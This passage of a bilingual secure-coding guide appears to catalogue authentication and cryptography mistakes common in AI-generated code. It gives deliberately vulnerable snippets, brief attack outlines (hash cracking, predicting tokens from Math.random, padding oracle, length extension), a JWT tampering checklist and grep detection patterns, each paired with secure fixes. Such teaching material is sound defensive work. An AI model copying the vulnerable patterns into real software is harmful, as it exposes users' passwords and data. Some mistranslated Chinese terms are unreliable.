"frame-ancestors 'none'; " + // Prevent clickjacking
"base-uri 'self'" // Prevent base tag injection
)
// SECURE: API endpoint headers
function setApiHeaders(response):
// API responses shouldn't be cached
response.setHeader("Cache-Control", "no-store")
// Prevent embedding
response.setHeader("X-Content-Type-Options", "nosniff")
// CORS configuration (adjust based on needs)
response.setHeader("Access-Control-Allow-Origin",
getAllowedOrigin()) // Not "*" for authenticated APIs!
response.setHeader("Access-Control-Allow-Credentials", "true")
response.setHeader("Access-Control-Allow-Methods",
"GET, POST, PUT, DELETE, OPTIONS")
response.setHeader("Access-Control-Allow-Headers",
"Content-Type, Authorization")
// RED FLAGS in authentication code:
// 1. Missing algorithm specification in JWT verification
jwt.verify(token, secret) // BAD - should specify algorithms
jwt.decode(token) // BAD - decode doesn't verify!
// 2. Session not regenerated after login
request.session.userId = user.id // Search for: session assignment without regenerate
// 3. Tokens in localStorage
localStorage.setItem("token" // Search for: localStorage.*token
// 4. No HttpOnly on session cookies
setCookie("session", id) // Search for: setCookie without httpOnly
// 5. Weak secrets
JWT_SECRET = "secret" // Search for: SECRET.*=.*["']
// 6. No expiration
jwt.sign(payload, secret) // Without expiresIn
// 7. Password comparison without constant-time
if password == storedHash // Direct comparison
// 8. No rate limiting on login
function login(email, password) // Check for rate limit before auth logic
// GREP patterns for security review:
// localStorage\.setItem.*token
// sessionStorage\.setItem.*token
// jwt\.decode\s*\(
// jwt\.verify\s*\([^,]+,[^,]+\s*\) (missing options)
// sameSite.*None
// password.*==
// \.secret\s*=\s*["']
// Authentication security test cases:
// 1. Token manipulation tests
- [ ] Change JWT algorithm to "none" and remove signature
- [ ] Modify JWT payload (role, user ID) and check if accepted
- [ ] Use expired token
- [ ] Use token with wrong issuer/audience
// 2. Session tests
- [ ] Check if session ID changes after login
- [ ] Attempt session fixation (set session ID before login)
- [ ] Check session timeout enforcement
- [ ] Verify logout actually invalidates session
// 3. Password tests
- [ ] Test common passwords (password123, qwerty, etc.)
- [ ] Test password length limits (very long passwords)
- [ ] Check password reset token predictability
- [ ] Verify password reset invalidates old tokens
// 4. Cookie tests
- [ ] Check HttpOnly flag on session cookies
- [ ] Check Secure flag on session cookies
- [ ] Test SameSite enforcement
- [ ] Verify cookie scope (path, domain)
// 5. Rate limiting tests
- [ ] Attempt rapid login failures
- [ ] Check for account lockout
- [ ] Test rate limit bypass (different IPs, headers)
// 6. OAuth tests
- [ ] Test with missing state parameter
- [ ] Test with reused state parameter
- [ ] Check redirect_uri validation
CWE 参考: CWE-327(使用已损坏或存在风险的加密算法)、CWE-328(可逆单向哈希)、CWE-329(CBC 模式下未使用随机初始化向量)、CWE-330(使用随机性不足的值)、CWE-331(熵不足)、CWE-338(使用加密强度较弱的伪随机数生成器)、CWE-916(使用计算量不足的密码哈希)
优先级评分: 18-20(频率:7,严重性:9,可检测性:4-6)
加密实现是安全敏感代码中最危险的领域之一。由于多种因素的叠加,人工智能模型尤其容易生成不安全的加密模式:
为什么人工智能模型会生成弱加密:
训练数据存在时间滞后:加密最佳实践不断发展演进。训练数据包含多年过时的教程、Stack Overflow 上的答案以及推荐已被认为失效的算法(例如 MD5、SHA1、DES、RC4)的文档。人工智能模型无法区分“2015 年有效”和“2025 年安全”。
教程简化:教育材料通常使用简化的加密示例来讲解概念——例如,使用 MD5 进行演示,使用短密钥以提高可读性,使用静态初始化向量 (IV) 以提高可复现性。人工智能会将这些“教学模式”学习为有效的实现方式。
复制粘贴现象普遍存在:加密代码经常被复制而非理解。训练数据也反映了这一点——相同的不安全模式在不同的存储库中出现了数千次,从而强化了错误的方法。
API 复杂性隐藏着危险:现代加密库的 API 非常复杂,其默认参数可能存在安全隐患。人工智能生成的代码虽然“运行正常”,但却使用默认设置,而没有意识到这些默认设置可能缺乏身份验证(例如 ECB 模式)或使用了弱密钥派生方法。
安全性与便捷性之间的权衡:人工智能模型优化的是代码的编译和运行。加密安全通常需要额外的步骤(例如正确的初始化向量生成、认证模式、密钥派生),而人工智能为了简化操作会省略这些步骤。
跨语言混淆:不同语言的加密 API 差异巨大。人工智能会将来自不同生态系统的模式混淆,生成混合代码,这些代码可能可以编译,但却违反了两个库的安全假设。
影响统计数据:
// VULNERABLE: MD5 for password hashing
function hashPassword(password):
return md5(password)
// VULNERABLE: SHA1 for password storage
function storePassword(userId, password):
hashedPassword = sha1(password)
database.update("users", userId, {"password": hashedPassword})
// VULNERABLE: Single-round SHA256 (still too fast)
function createPasswordHash(password):
return sha256(password)
// VULNERABLE: Unsalted hash
function verifyPassword(inputPassword, storedHash):
return sha256(inputPassword) == storedHash
// VULNERABLE: Simple salt without proper KDF
function hashWithSalt(password, salt):
return sha256(salt + password)
// VULNERABLE: MD5 with salt (still MD5)
function improvedHash(password):
salt = generateRandomBytes(16)
hash = md5(salt + password)
return salt + ":" + hash
为什么这样做很危险:
攻击场景:
// Attacker steals database with MD5 password hashes
// Using hashcat on modern GPU:
hashcat_speed = 180_000_000_000 // 180 billion MD5/second
common_passwords = 1_000_000_000 // 1 billion common passwords
time_to_crack_all = common_passwords / hashcat_speed
// Result: ~5.5 seconds to check ALL common passwords against ALL hashes
// Even SHA256 is fast:
sha256_speed = 23_000_000_000 // 23 billion SHA256/second
// Still under a minute for billion password list
// VULNERABLE: ECB mode reveals patterns
function encryptData(plaintext, key):
cipher = createCipher("AES", key, mode = "ECB")
return cipher.encrypt(plaintext)
// VULNERABLE: Default mode may be ECB in some libraries
function simpleEncrypt(data, key):
cipher = AES.new(key) // Some libraries default to ECB!
return cipher.encrypt(padData(data))
// VULNERABLE: Explicit ECB for "simplicity"
function encryptUserData(userData, encryptionKey):
algorithm = "AES/ECB/PKCS5Padding" // Java-style
cipher = Cipher.getInstance(algorithm)
cipher.init(ENCRYPT_MODE, encryptionKey)
return cipher.doFinal(userData)
// VULNERABLE: Assuming any AES is secure
function protectSensitiveData(data, key):
// "AES is strong encryption" - but ECB mode is not
encryptor = AESEncryptor(key, mode = "ECB")
return encryptor.encrypt(data)
为什么这样做很危险:
视觉演示:
// Original image (bitmap of a penguin):
// ████████████████
// ██ ████ ██
// ██ ██████ ██
// ██████████████
// ████ ████████
// ████████████████
// After ECB encryption:
// ???????????????? ← Still shows penguin shape!
// ?? ???? ?? ← Identical colors → identical ciphertext
// ?? ?????? ??
// ??????????????
// ???? ????????
// ????????????????
// After CBC/GCM encryption:
// ???????????????? ← Random appearance
// ???????????????? ← No pattern visible
// ????????????????
// ????????????????
// ????????????????
// ????????????????
// VULNERABLE: Hardcoded IV
STATIC_IV = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
function encryptMessage(plaintext, key):
cipher = AES.new(key, AES.MODE_CBC, iv = STATIC_IV)
return cipher.encrypt(padData(plaintext))
// VULNERABLE: Same IV for all encryptions
class Encryptor:
IV = generateRandomBytes(16) // Generated ONCE at startup
function encrypt(data, key):
cipher = createCipher("AES-CBC", key, this.IV)
return cipher.encrypt(data)
// VULNERABLE: Predictable IV (counter without random start)
nonce_counter = 0
function encryptWithNonce(plaintext, key):
nonce_counter = nonce_counter + 1
nonce = intToBytes(nonce_counter, 12) // Predictable!
return AES_GCM_encrypt(key, nonce, plaintext)
// VULNERABLE: IV derived from predictable data
function encryptRecord(userId, data, key):
iv = sha256(toString(userId))[:16] // Same IV for same user!
return AES_CBC_encrypt(key, iv, data)
// VULNERABLE: Timestamp-based IV
function timeBasedEncrypt(data, key):
iv = sha256(toString(getCurrentTimestamp()))[:16]
return AES_CBC_encrypt(key, iv, data)
// Problem: Collisions if encrypted in same second
为什么这样做很危险:
GCM随机数重用攻击:
// If same nonce used twice with same key in GCM:
// Message 1: plaintext1, ciphertext1, tag1
// Message 2: plaintext2, ciphertext2, tag2
// Attacker can compute:
// - XOR of plaintext1 and plaintext2
// - Eventually recover the authentication key H
// - Forge arbitrary messages with valid tags
// This is a CATASTROPHIC failure of GCM mode
// "Nonce misuse resistance" modes exist (GCM-SIV) for this reason
// VULNERABLE: Math.random for token generation
function generateResetToken():
token = ""
for i in range(32):
token = token + toString(floor(random() * 16), base = 16)
return token
// VULNERABLE: Math.random for session ID
function createSessionId():
return "session_" + toString(random() * 1000000000)
// VULNERABLE: Seeded random with predictable seed
function generateApiKey(userId):
setSeed(userId * getCurrentTimestamp())
key = ""
for i in range(32):
key = key + randomChoice(ALPHANUMERIC_CHARS)
return key
// VULNERABLE: Using non-crypto random for encryption IV
function quickEncrypt(data, key):
iv = []
for i in range(16):
iv.append(floor(random() * 256))
return AES_CBC_encrypt(key, iv, data)
// VULNERABLE: JavaScript Math.random() is NOT cryptographic
function generateToken():
return btoa(String.fromCharCode.apply(null,
Array.from({length: 32}, () => Math.floor(Math.random() * 256))
))
为什么这样做很危险:
状态恢复攻击:
// Attacker collects multiple password reset tokens
tokens_observed = [
"a3f7c2e9b1d4...", // Token 1
"8e2a5f1c9b3d...", // Token 2
// ... collect ~30-50 tokens
]
// Using z3 SMT solver or custom reversing:
function recoverMathRandomState(observed_outputs):
// V8's xorshift128+ can be reversed
// Once state recovered, predict next token
state = reverseEngineerState(observed_outputs)
next_token = predictNextOutput(state)
return next_token
// Attacker generates password reset for victim
// Then predicts the token value
// Completes password reset without email access
// VULNERABLE: Key in source code
ENCRYPTION_KEY = "MySecretKey12345"
function encryptUserData(data):
return AES_encrypt(ENCRYPTION_KEY, data)
// VULNERABLE: Key derived from application constant
function getEncryptionKey():
return sha256(APPLICATION_NAME + ENVIRONMENT + "secret")
// VULNERABLE: Same key for all users
MASTER_KEY = bytes.fromhex("0123456789abcdef0123456789abcdef")
function encryptForUser(userId, data):
return AES_encrypt(MASTER_KEY, data)
// VULNERABLE: Key in configuration file (committed to git)
// config.py:
CRYPTO_CONFIG = {
"encryption_key": "dGhpcyBpcyBhIHNlY3JldCBrZXk=", // Base64 encoded
"hmac_key": "another_secret_key_here"
}
// VULNERABLE: Weak key (too short)
function quickEncrypt(data):
key = "short" // 5 bytes, not 16/24/32
return AES_encrypt(pad(key, 16), data) // Padded with zeros!
为什么这样做很危险:
// VULNERABLE: Direct use of password as key
function deriveKey(password):
return password.encode()[:32] // Truncate or pad to key size
// VULNERABLE: Simple hash as key derivation
function passwordToKey(password):
return sha256(password) // Single round, no salt
// VULNERABLE: MD5-based key derivation
function getKeyFromPassword(password, salt):
return md5(password + salt)
// VULNERABLE: Insufficient iterations
function deriveKeyPBKDF2(password, salt):
return PBKDF2(password, salt, iterations = 1000)
// 2025 recommendation: minimum 600,000 for SHA256
// VULNERABLE: Using key derivation output directly for multiple purposes
function setupCrypto(password, salt):
derived = PBKDF2(password, salt, iterations = 100000, keyLength = 64)
encryptionKey = derived[:32] // First half
hmacKey = derived[32:] // Second half
// Problem: related keys, should use separate derivations
// VULNERABLE: Weak salt (too short, predictable, or reused)
function deriveKeyWithWeakSalt(password):
salt = "salt" // Static salt defeats purpose
return PBKDF2(password, salt, iterations = 100000)
为什么这样做很危险:
迭代次数指导(2025):
// PBKDF2-SHA256 minimum iterations by use case:
// - Interactive login (100ms budget): 600,000 iterations
// - Background/async (1s budget): 2,000,000 iterations
// - High-security (offline storage): 10,000,000 iterations
// bcrypt cost factor:
// - Minimum 2025: cost = 12 (about 250ms)
// - Recommended: cost = 13-14
// - High-security: cost = 15+
// Argon2id parameters (2025):
// - Memory: 64 MB minimum, 256 MB recommended
// - Iterations: 3 minimum
// - Parallelism: match available cores
// - Argon2id recommended over Argon2i or Argon2d
// SECURE: bcrypt with appropriate cost factor
function hashPassword(password):
// Cost factor 12 = ~250ms on modern hardware
// Increase cost factor annually as hardware improves
cost = 12
return bcrypt.hash(password, cost)
function verifyPassword(password, storedHash):
// bcrypt.verify handles timing-safe comparison internally
return bcrypt.verify(password, storedHash)
// SECURE: Argon2id (recommended for new applications)
function hashPasswordArgon2(password):
// Argon2id: hybrid resistant to both side-channel and GPU attacks
options = {
type: ARGON2ID,
memoryCost: 65536, // 64 MB
timeCost: 3, // 3 iterations
parallelism: 4, // 4 parallel threads
hashLength: 32 // 256-bit output
}
return argon2.hash(password, options)
function verifyPasswordArgon2(password, storedHash):
return argon2.verify(storedHash, password)
// SECURE: scrypt for memory-hard hashing
function hashPasswordScrypt(password):
// N = CPU/memory cost (power of 2)
// r = block size
// p = parallelization parameter
salt = generateSecureRandom(16)
hash = scrypt(password, salt, N = 2^17, r = 8, p = 1, keyLen = 32)
return encodeSaltAndHash(salt, hash)
// SECURE: Migrating from weak to strong hashing
function upgradePasswordHash(userId, password, currentHash):
// Verify against old hash
if legacyVerify(password, currentHash):
// Re-hash with modern algorithm
newHash = hashPasswordArgon2(password)
database.update("users", userId, {"password_hash": newHash})
return true
return false
为什么说它是安全的:
// SECURE: AES-256-GCM with proper nonce handling
function encryptAESGCM(plaintext, key):
// Generate cryptographically random 96-bit nonce
nonce = generateSecureRandom(12)
cipher = createCipher("AES-256-GCM", key)
cipher.setNonce(nonce)
// Optional: Add authenticated additional data (AAD)
// AAD is authenticated but NOT encrypted
aad = "context:user_data:v1"
cipher.setAAD(aad)
ciphertext = cipher.encrypt(plaintext)
authTag = cipher.getAuthTag() // 128-bit tag
// Return nonce + tag + ciphertext (all needed for decryption)
return nonce + authTag + ciphertext
function decryptAESGCM(encryptedData, key):
// Extract components
nonce = encryptedData[:12]
authTag = encryptedData[12:28]
ciphertext = encryptedData[28:]
cipher = createCipher("AES-256-GCM", key)
cipher.setNonce(nonce)
cipher.setAAD("context:user_data:v1") // Must match encryption
cipher.setAuthTag(authTag)
try:
plaintext = cipher.decrypt(ciphertext)
return plaintext
catch AuthenticationError:
// Tag verification failed - data tampered or wrong key
log.warn("Decryption authentication failed - possible tampering")
return null
// SECURE: XChaCha20-Poly1305 (extended nonce variant)
function encryptXChaCha(plaintext, key):
// 192-bit nonce - safe for random generation
nonce = generateSecureRandom(24)
ciphertext, tag = xchachapoly.encrypt(key, nonce, plaintext)
return nonce + tag + ciphertext
为什么说它是安全的:
// SECURE: Random IV for CBC mode
function encryptCBC(plaintext, key):
// 128-bit random IV for AES
iv = generateSecureRandom(16)
cipher = createCipher("AES-256-CBC", key)
ciphertext = cipher.encrypt(plaintext, iv)
// Prepend IV to ciphertext (IV doesn't need to be secret)
return iv + ciphertext
function decryptCBC(encryptedData, key):
iv = encryptedData[:16]
ciphertext = encryptedData[16:]
cipher = createCipher("AES-256-CBC", key)
return cipher.decrypt(ciphertext, iv)
// SECURE: Counter-based nonce with random prefix (for GCM)
class SecureNonceGenerator:
// Random 32-bit prefix + 64-bit counter
// Safe for 2^64 messages with same key
function __init__():
this.prefix = generateSecureRandom(4) // 32-bit random
this.counter = 0
this.lock = Mutex()
function generate():
this.lock.acquire()
this.counter = this.counter + 1
if this.counter >= 2^64:
throw Error("Nonce counter exhausted - rotate key")
nonce = this.prefix + intToBytes(this.counter, 8)
this.lock.release()
return nonce
// SECURE: Synthetic IV (SIV) for nonce-misuse resistance
function encryptSIV(plaintext, key):
// AES-GCM-SIV: Safe even if nonce is accidentally repeated
nonce = generateSecureRandom(12)
ciphertext = AES_GCM_SIV_encrypt(key, nonce, plaintext)
return nonce + ciphertext
// Note: Repeated nonce only leaks if same plaintext encrypted
为什么说它是安全的:
// SECURE: Using OS/platform CSPRNG
// Node.js
function generateSecureRandom(length):
return crypto.randomBytes(length)
// Python
function generateSecureRandom(length):
return secrets.token_bytes(length)
// Java
function generateSecureRandom(length):
random = SecureRandom.getInstanceStrong()
bytes = new byte[length]
random.nextBytes(bytes)
return bytes
// Go
function generateSecureRandom(length):
bytes = make([]byte, length)
_, err = crypto_rand.Read(bytes)
if err != nil:
panic("CSPRNG failure")
return bytes
// SECURE: Token generation for URLs/APIs
function generateUrlSafeToken(length):
// Generate random bytes, encode to URL-safe base64
randomBytes = generateSecureRandom(length)
return base64UrlEncode(randomBytes)
function generateResetToken():
// 256 bits of entropy for password reset token
return generateUrlSafeToken(32)
function generateApiKey():
// Prefix for identification + random component
prefix = "sk_live_"
randomPart = generateUrlSafeToken(24)
return prefix + randomPart
// SECURE: Random number in range
function secureRandomInt(min, max):
range = max - min + 1
bytesNeeded = ceil(log2(range) / 8)
// Rejection sampling to avoid modulo bias
while true:
randomBytes = generateSecureRandom(bytesNeeded)
value = bytesToInt(randomBytes)
if value < (2^(bytesNeeded*8) / range) * range:
return min + (value % range)
为什么说它是安全的:
// SECURE: PBKDF2 with sufficient iterations
function deriveKeyPBKDF2(password, purpose):
// Generate unique salt per derivation
salt = generateSecureRandom(16)
// 600,000 iterations minimum for SHA-256 (2025)
iterations = 600000
// Derive key of required length
derivedKey = PBKDF2(
password = password,
salt = salt,
iterations = iterations,
keyLength = 32, // 256 bits
hashFunction = SHA256
)
// Store salt with derived key for later verification
return {salt: salt, key: derivedKey}
// SECURE: HKDF for deriving multiple keys from one secret
function deriveMultipleKeys(masterSecret, purpose):
// HKDF-Extract: Create pseudorandom key from input
salt = generateSecureRandom(32)
prk = HKDF_Extract(salt, masterSecret)
// HKDF-Expand: Derive purpose-specific keys
encryptionKey = HKDF_Expand(prk, info = "encryption", length = 32)
hmacKey = HKDF_Expand(prk, info = "authentication", length = 32)
searchKey = HKDF_Expand(prk, info = "search-index", length = 32)
return {
encryption: encryptionKey,
hmac: hmacKey,
search: searchKey,
salt: salt // Store for re-derivation
}
// SECURE: Argon2 for password-based key derivation
function deriveKeyFromPassword(password, salt = null):
if salt == null:
salt = generateSecureRandom(16)
derivedKey = argon2id(
password = password,
salt = salt,
memoryCost = 65536, // 64 MB
timeCost = 3,
parallelism = 4,
outputLength = 32
)
return {key: derivedKey, salt: salt}
// SECURE: Key derivation with domain separation
function deriveKeyWithContext(masterKey, context, subkeyId):
// Context prevents cross-purpose key use
info = context + ":" + subkeyId
return HKDF_Expand(masterKey, info, 32)
// Example: Derive per-user encryption keys
function getUserEncryptionKey(masterKey, userId):
return deriveKeyWithContext(masterKey, "user-data-encryption", userId)
为什么说它是安全的:
// SECURE: Key versioning for rotation
class KeyManager:
function __init__(keyStore):
this.keyStore = keyStore
this.currentKeyVersion = keyStore.getCurrentVersion()
function encrypt(plaintext):
key = this.keyStore.getKey(this.currentKeyVersion)
nonce = generateSecureRandom(12)
ciphertext = AES_GCM_encrypt(key, nonce, plaintext)
// Include key version in output for decryption
return encodeVersionedCiphertext(
version = this.currentKeyVersion,
nonce = nonce,
ciphertext = ciphertext
)
function decrypt(encryptedData):
version, nonce, ciphertext = decodeVersionedCiphertext(encryptedData)
// Fetch correct key version (may be old version)
key = this.keyStore.getKey(version)
if key == null:
throw KeyNotFoundError("Key version " + version + " not available")
return AES_GCM_decrypt(key, nonce, ciphertext)
function rotateKey():
newVersion = this.currentKeyVersion + 1
newKey = generateSecureRandom(32)
this.keyStore.storeKey(newVersion, newKey)
this.currentKeyVersion = newVersion
// Schedule background re-encryption of old data
scheduleReEncryption(newVersion - 1, newVersion)
// SECURE: Re-encryption during key rotation
function reEncryptData(dataId, oldVersion, newVersion, keyManager):
// Fetch encrypted data
encryptedData = database.get("encrypted_data", dataId)
// Verify it uses old key version
currentVersion = extractKeyVersion(encryptedData)
if currentVersion >= newVersion:
return // Already using new or newer key
// Decrypt with old key, re-encrypt with new
plaintext = keyManager.decrypt(encryptedData)
newEncryptedData = keyManager.encrypt(plaintext)
// Atomic update
database.update("encrypted_data", dataId, {
"data": newEncryptedData,
"key_version": newVersion,
"rotated_at": getCurrentTimestamp()
})
// SECURE: Key wrapping for storage
function storeEncryptionKey(keyToStore, masterKey):
// Wrap (encrypt) the key with master key
nonce = generateSecureRandom(12)
wrappedKey = AES_GCM_encrypt(masterKey, nonce, keyToStore)
return {
wrapped_key: wrappedKey,
nonce: nonce,
algorithm: "AES-256-GCM",
created_at: getCurrentTimestamp()
}
function retrieveEncryptionKey(wrappedKeyData, masterKey):
return AES_GCM_decrypt(
masterKey,
wrappedKeyData.nonce,
wrappedKeyData.wrapped_key
)
为什么说它是安全的:
// VULNERABLE: Revealing padding validity in error messages
function decryptCBC_vulnerable(ciphertext, key, iv):
try:
plaintext = AES_CBC_decrypt(key, iv, ciphertext)
unpadded = removePKCS7Padding(plaintext)
return {success: true, data: unpadded}
catch PaddingError:
return {success: false, error: "Invalid padding"} // ORACLE!
catch DecryptionError:
return {success: false, error: "Decryption failed"}
// Attack: Padding oracle allows full plaintext recovery
// Attacker modifies ciphertext bytes, observes padding errors
// ~128 requests per byte to recover plaintext (on average)
// SECURE: Use authenticated encryption (GCM) or constant-time handling
function decryptCBC_secure(ciphertext, key, iv):
try:
// First verify HMAC before any decryption
providedHmac = ciphertext[-32:]
ciphertextData = ciphertext[:-32]
expectedHmac = HMAC_SHA256(key, iv + ciphertextData)
if not constantTimeEquals(providedHmac, expectedHmac):
return {success: false, error: "Decryption failed"} // Generic error
plaintext = AES_CBC_decrypt(key, iv, ciphertextData)
unpadded = removePKCS7Padding(plaintext)
return {success: true, data: unpadded}
catch:
return {success: false, error: "Decryption failed"} // Same error always
// BEST: Just use GCM which prevents this class of attack entirely
吸取的教训:
// VULNERABLE: Using hash(secret + message) for authentication
function createAuthToken(secretKey, message):
return sha256(secretKey + message) // Length extension vulnerable!
function verifyAuthToken(secretKey, message, token):
expected = sha256(secretKey + message)
return token == expected
// Attack: Attacker knows hash(secret + message) and length of secret
// Can compute hash(secret + message + padding + attacker_data)
// Without knowing the secret!
// Example attack:
// Original: hash(secret + "amount=100") = abc123...
// Attacker computes: hash(secret + "amount=100" + padding + "&amount=999")
// Server verifies this as valid!
// SECURE: Use HMAC
function createAuthTokenSecure(secretKey, message):
return HMAC_SHA256(secretKey, message)
function verifyAuthTokenSecure(secretKey, message, token):
expected = HMAC_SHA256(secretKey, message)
return constantTimeEquals(token, expected)
// SECURE: Use hash(message + secret) - prevents extension but HMAC preferred
// SECURE: Use SHA-3/SHA-512/256 (resistant to length extension)
function alternativeAuth(secretKey, message):
return SHA3_256(secretKey + message) // SHA-3 is resistant
吸取的教训:
// VULNERABLE: Early-exit string comparison
function verifyToken(providedToken, expectedToken):
if length(providedToken) != length(expectedToken):
return false
for i in range(length(providedToken)):
if providedToken[i] != expectedToken[i]:
return false // Early exit reveals position of first difference
return true
// Attack: Timing differences reveal correct characters
// Correct first char: ~1μs longer than wrong first char
// Attacker can brute-force character-by-character
// VULNERABLE: Using == operator (language-dependent timing)
function checkHmac(provided, expected):
return provided == expected // May have variable-time implementation
// SECURE: Constant-time comparison
function constantTimeEquals(a, b):
if length(a) != length(b):
// Still constant-time for the comparison
// Length difference may leak - consider padding
return false
result = 0
for i in range(length(a)):
// XOR and OR accumulate differences without early exit
result = result | (a[i] XOR b[i])
return result == 0
// SECURE: Using crypto library comparison
function verifyHmacSecure(message, providedHmac, key):
expectedHmac = HMAC_SHA256(key, message)
return crypto.timingSafeEqual(providedHmac, expectedHmac)
// SECURE: Double-HMAC comparison (timing-safe by design)
function verifyWithDoubleHmac(message, providedMac, key):
expectedMac = HMAC_SHA256(key, message)
// Compare HMACs of the MACs - timing doesn't leak original MAC
return HMAC_SHA256(key, providedMac) == HMAC_SHA256(key, expectedMac)
吸取的教训:
// VULNERABLE: Same key for encryption and authentication
SHARED_KEY = loadKey("master")
function encryptData(data):
return AES_GCM_encrypt(SHARED_KEY, generateNonce(), data)
function signData(data):
return HMAC_SHA256(SHARED_KEY, data) // Same key!
// Problem: Cryptographic interactions between uses
// Some attacks become possible when key is used in multiple algorithms
// VULNERABLE: Same key for different users/tenants
function encryptForTenant(tenantId, data):
return AES_GCM_encrypt(MASTER_KEY, generateNonce(), data)
// All tenants share encryption key - one compromise = all compromised
// SECURE: Derive separate keys for each purpose
MASTER_KEY = loadKey("master")
function getEncryptionKey():
return HKDF_Expand(MASTER_KEY, "encryption-aes-256-gcm", 32)
function getAuthenticationKey():
return HKDF_Expand(MASTER_KEY, "authentication-hmac-sha256", 32)
function getSearchKey():
return HKDF_Expand(MASTER_KEY, "searchable-encryption", 32)
// SECURE: Per-tenant key derivation
function getTenantEncryptionKey(tenantId):
// Each tenant gets unique derived key
info = "tenant-encryption:" + tenantId
return HKDF_Expand(MASTER_KEY, info, 32)
function encryptForTenantSecure(tenantId, data):
tenantKey = getTenantEncryptionKey(tenantId)
return AES_GCM_encrypt(tenantKey, generateNonce(), data)
吸取的教训:
// COMMON MISTAKE: CBC encryption without HMAC
function encryptDataWrong(data, key):
iv = generateSecureRandom(16)
ciphertext = AES_CBC_encrypt(key, iv, data)
return iv + ciphertext
// Missing: No way to detect tampering!
// Attack: Bit-flipping in CBC mode
// Flipping bit N in ciphertext block C[i] flips bit N in plaintext block P[i+1]
// Attacker can modify data without detection
// Example: Encrypted JSON {"admin": false, "amount": 100}
// Attacker can flip bits to change "false" to "true" or modify amount
// CORRECT: Encrypt-then-MAC
function encryptDataCorrect(data, encKey, macKey):
iv = generateSecureRandom(16)
ciphertext = AES_CBC_encrypt(encKey, iv, data)
// MAC covers IV and ciphertext
mac = HMAC_SHA256(macKey, iv + ciphertext)
return iv + ciphertext + mac
function decryptDataCorrect(encrypted, encKey, macKey):
iv = encrypted[:16]
mac = encrypted[-32:]
ciphertext = encrypted[16:-32]
// Verify MAC FIRST, before any decryption
expectedMac = HMAC_SHA256(macKey, iv + ciphertext)
if not constantTimeEquals(mac, expectedMac):
throw IntegrityError("Data has been tampered with")
return AES_CBC_decrypt(encKey, iv, ciphertext)
// BETTER: Just use GCM which includes authentication
function encryptDataBest(data, key):
nonce = generateSecureRandom(12)
ciphertext, tag = AES_GCM_encrypt(key, nonce, data)
return nonce + ciphertext + tag
解决方案:
// COMMON MISTAKE: Base64 as "encryption"
function "encrypt"Data(sensitiveData):
return base64Encode(sensitiveData) // NOT ENCRYPTION!
function "decrypt"Data(encodedData):
return base64Decode(encodedData)
// COMMON MISTAKE: XOR with short key as encryption
function "encrypt"WithXor(data, password):
key = password.repeat(ceil(length(data) / length(password)))
return xor(data, key) // Trivially broken with frequency analysis
// COMMON MISTAKE: ROT13 or character substitution
function "encrypt"Text(text):
return rot13(text) // No security at all
// COMMON MISTAKE: Obfuscation ≠ encryption
function storeApiKey(apiKey):
obfuscated = ""
for char in apiKey:
obfuscated += chr(ord(char) + 5) // Just shifted characters
return obfuscated
// COMMON MISTAKE: Custom "encryption" algorithm
function myEncrypt(data, key):
result = ""
for i, char in enumerate(data):
newChar = chr((ord(char) + ord(key[i % len(key)]) * 7) % 256)
result += newChar
return result // Easily broken - don't invent crypto!
现实检验:
| 方法 | 安全级别 | 用例 |
|---|---|---|
| Base64 | 0(无) | 仅二进制到文本编码 |
| ROT13 | 0(无) | 笑话,剧透隐藏 |
| 与重复密钥进行异或运算 | 微不足道的破损 | 切勿使用 |
| 本土“加密” | 未知,可能已损坏 | 切勿使用 |
| 使用随机密钥的 AES-GCM | 强的 | 实际加密 |
解决方案:
// COMMON MISTAKE: Logging the key
function generateAndStoreKey():
key = generateSecureRandom(32)
log.info("Generated new encryption key: " + hexEncode(key)) // LOGGED!
return key
// COMMON MISTAKE: Key in config file committed to git
// config.json:
{
"database_url": "...",
"encryption_key": "a1b2c3d4e5f6..." // Will be in git history forever
}
// COMMON MISTAKE: Key in environment variable visible in process list
// Launching: ENCRYPTION_KEY=secret123 ./myapp
// `ps aux` shows: myapp ENCRYPTION_KEY=secret123
// COMMON MISTAKE: Key stored in database alongside encrypted data
function storeEncryptedData(userId, sensitiveData):
key = generateSecureRandom(32)
encrypted = AES_GCM_encrypt(key, generateNonce(), sensitiveData)
database.insert("user_data", {
user_id: userId,
encrypted_data: encrypted,
encryption_key: key // KEY NEXT TO DATA = pointless encryption
})
// COMMON MISTAKE: Key derivation material stored insecurely
function setupEncryption(password):
salt = generateSecureRandom(16)
key = deriveKey(password, salt)
// Storing in easily accessible location
localStorage.setItem("encryption_salt", salt)
localStorage.setItem("derived_key", key) // KEY IN BROWSER STORAGE!
安全密钥存储模式:
// SECURE: Using a key management service (KMS)
function storeKeySecurely(keyId, keyMaterial):
// AWS KMS, Azure Key Vault, GCP KMS, HashiCorp Vault
kms.storeKey(keyId, keyMaterial, {
rotation_period: "90 days",
deletion_protection: true,
access_policy: restrictedPolicy
})
// SECURE: Key wrapped with hardware security module (HSM)
function wrapKeyForStorage(dataKey):
wrappingKey = hsm.getWrappingKey() // Never leaves HSM
wrappedKey = hsm.wrapKey(dataKey, wrappingKey)
return wrappedKey // Safe to store - can only unwrap with HSM
// SECURE: Envelope encryption pattern
function envelopeEncrypt(data):
// Generate data encryption key (DEK)
dek = generateSecureRandom(32)
// Encrypt data with DEK
encryptedData = AES_GCM_encrypt(dek, generateNonce(), data)
// Encrypt DEK with key encryption key (KEK) from KMS
encryptedDek = kms.encrypt(dek)
// Store encrypted DEK with encrypted data
return {
encrypted_data: encryptedData,
encrypted_key: encryptedDek, // DEK is encrypted, safe to store
kms_key_id: kms.getCurrentKeyId()
}
| 算法 | 钥匙尺寸 | 用例 | 笔记 |
|---|---|---|---|
| AES-256-GCM | 256 位 | 通用 | 推荐默认值,96 位 nonce |
| ChaCha20-Poly1305 | 256 位 | 对性能要求高的移动平台 | 无需 AES-NI 硬件即可更快 |
| XChaCha20-Poly1305 | 256 位 | 大容量加密 | 192 位 nonce,可安全用于随机生成 |
| AES-256-GCM-SIV | 256 位 | 抗非法活动滥用 | 速度稍慢,但意外重复使用更安全 |
避免使用: DES、3DES、RC4、Blowfish、AES-ECB、不含HMAC的AES-CBC
| 算法 | 记忆 | 用例 | 笔记 |
|---|---|---|---|
| Argon2id | 64+ MB | 新应用 | 最佳保护,内存硬盘 |
| bcrypt | 不适用 | 传统兼容性 | 广泛支持,成本12+ |
| scrypt | 64+ MB | 当氩气不可用时 | 不错的替代方案 |
避免使用: MD5、SHA1、SHA256(单轮)、迭代次数少于60万次的PBKDF2
